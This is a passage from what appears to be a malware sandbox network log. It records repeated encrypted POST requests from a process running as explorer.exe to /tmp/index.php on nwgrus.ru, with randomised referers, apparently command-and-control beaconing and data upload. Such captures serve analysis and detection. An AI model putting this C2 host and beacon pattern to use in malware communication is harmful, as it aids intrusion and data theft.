                                                          Referer: http://mkmjhgiqxobee.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 173
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:37.424860954 CEST173OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4d 4e a3 87
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuMNr@fk~*3O 7fOzc|WF.t\A$STqG:j5lV/
                                                          Oct 12, 2024 22:28:38.672749996 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:38 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449742190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:38.687381029 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://guwkkhaqmlu.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 128
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:38.687443972 CEST128OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 51 d6 9f
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuPQb-OS@j709w`P/=nt
                                                          Oct 12, 2024 22:28:39.768317938 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:39 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449743190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:39.777894974 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ipxaqeyacookwjhd.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 250
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:39.777895927 CEST250OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 23 49 bc a7
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu#InkgUh({csMH4HI[&Hv$HB4@*Ffn8C/Y,w,rKF@5&arx0V"
                                                          Oct 12, 2024 22:28:40.835685968 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:40 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449744190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:41.085225105 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://fjjppebnfln.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 285
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:41.085225105 CEST285OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4f 03 b2 f9
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuO@w~nf^q@~y:PZXtB v1,"mQ}WfaG8iV L:lsAxT)m(jH;u
                                                          Oct 12, 2024 22:28:42.151626110 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449745190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:42.162394047 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://giecrmryibj.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 262
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:42.162415981 CEST262OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 49 48 c1 e0
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuIHnMdpRtA}Wf<,<ic)@#yB>^Vv%i6H^WKghg+U(>/aMqC*U(l~&Er
                                                          Oct 12, 2024 22:28:43.233310938 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:43 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449746190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:43.247734070 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ftxsovsyqtpojv.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 246
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:43.247759104 CEST246OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 4b 2f aa f1
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuK/YsY_+)m|:GIz;w0 AgK1)7aLE&VEXr0M\3wA%]xc*{R\
                                                          Oct 12, 2024 22:28:44.333525896 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:44 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449747190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:44.343616962 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bdnqdofcypmiflj.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 322
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:44.343703032 CEST322OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 37 0c f9 b6
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu7y`avcY#u6{KKZu<)LD3#-&n|q&{#7Gj8@e\ `8\;bnN-Ss
                                                          Oct 12, 2024 22:28:45.426671982 CEST137INHTTP/1.1 200 OK
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:45 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449748190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:45.445760965 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://sfxppmjegqvmfflo.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 218
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:45.445760965 CEST218OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 73 30 d4 8e
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vus0j~m'l)r'35h7+,VCO'lx}:3cBi_)clm%\:?KN7b
                                                          Oct 12, 2024 22:28:46.545255899 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:46 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449749190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:46.554502964 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bdvavhcwwpnmuonq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 287
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:46.554517031 CEST287OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 2d 49 bf 85
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu-IgQAf;ecQE<"jY*DP1ly@Q'-^2v O sA+o`21/f-QUM;a*^gcLT,
                                                          Oct 12, 2024 22:28:47.805634022 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:47 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449750190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:47.814610004 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://qvliyttnwva.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 120
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:47.814631939 CEST120OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7e 4a e8 f9
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu~JdPCj}p|XrY<hhI*)
                                                          Oct 12, 2024 22:28:48.887799025 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449751190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:48.896249056 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://lcuvnbvrwwue.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 121
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:48.896281004 CEST121OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 24 0d db fb
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu$3ywYpt_aw{5R)
                                                          Oct 12, 2024 22:28:49.962893009 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:49 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449752190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:49.971869946 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xabseqytshw.com/
